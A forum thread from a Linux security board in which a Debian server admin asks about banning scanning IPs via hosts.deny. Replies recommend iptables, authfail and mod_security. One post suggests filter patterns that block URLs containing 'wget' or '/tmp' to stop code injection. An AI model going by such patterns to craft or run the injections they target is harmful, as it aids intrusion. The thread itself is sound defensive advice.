Linux - SecurityThis forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Introduction to Linux - A Hands on Guide
This guide was created as an overview of the Linux Operating System, geared toward new users as an exploration tour and getting started guide, with exercises at the end of each chapter.
For more advanced trainees it can be a desktop reference, and a collection of the base knowledge needed to proceed with system and network administration. This book contains many real life examples derived from the author's experience as a Linux system and network administrator, trainer and consultant. They hope these examples will help you to get a better understanding of the Linux system and that you feel encouraged to try out things on your own.
Click Here to receive this Complete Guide absolutely free.
I'm running Apache on a Debian Sarge server. Every day I check the log files and I see people trying to open directories I don't have in my web path. I take their IPs and add them to my hosts.deny file.
How much can this slow down your system? I have several entries in my hosts.deny file and they're growing almost daily. How much of a problem does this pose?
True, and I've wondered how futile is it to do this. But I really hate it when people try to get in and illegally mine data. It really gets to me. So putting their IPs in hosts.deny at least keeps them from coming back.
Do you recommend something else? I'm open to ideas. What's happening is I see in my apache2/error.log enteries like "<host IP> /www/php/sumthin.php 404 ...." and there will be dozens of attempts from the same IP. I'll take the IP and enter it into hosts.deny and they don't come back.
Well, there is a method to add temporary rules to the firewall if there are to many failed attempts to log in. Won't work with a web server though, legit clients can make multiple requests too. I'd recommend you better get used to this. I was worried too when I saw the auth.log of my first server. Looong lists of dictionary hackers, daily. Now I don't care. I know they cannot get in and this is all that matters.
My auth.log files are okay. I run a program called authfail that automatically logs 3 failed attempts and adds them to iptables to drop their connection. It works great and keeps people out. I highly recommend it.
What concerns me are attacks on my web server. I've had it attacked and broken into twice in 2003 and I'm kinda paranoid about it. Anything I can do to keep them bastards out I will. When I trace down some of the IPs I notice that some are coming from .ro and I know no one legit is looking at my web server from there!
I just wanted to make sure I wasn't bulking down my server by having too many entries in hosts.deny. I am noticing less and less entries in my logs; it must be working to some degree.
Check out authfail -- it's almost perfectly automatic.
Note that Apache does not have support for host.deny (libwrap/tcp_wrappers) by default, so using it for access control does nothing. If you want to ban them use iptables or Apache's built-in access control features.
Adding huge numbers of hosts to iptables or hosts.deny will eventually slow the system down, so trying to ban IPs for random scanning is a lost cause IMHO. Save bannination for persistant abusers and spend the time hardening your system against exploitation and making sure it's updated with security patches.
So using hosts.deny doesn't stop them from accessing Apache, so using it was futile anyway.
Take a look at mod_security if you are interested in implementing a little more preventative security measures for Apache. Creating custom filters to block typical PHP and XML-RPC scans that are common isn't very difficult and you can even create filters to block 0-day exploits that attempt code injection (like URLs containing the string "wget" or "/tmp").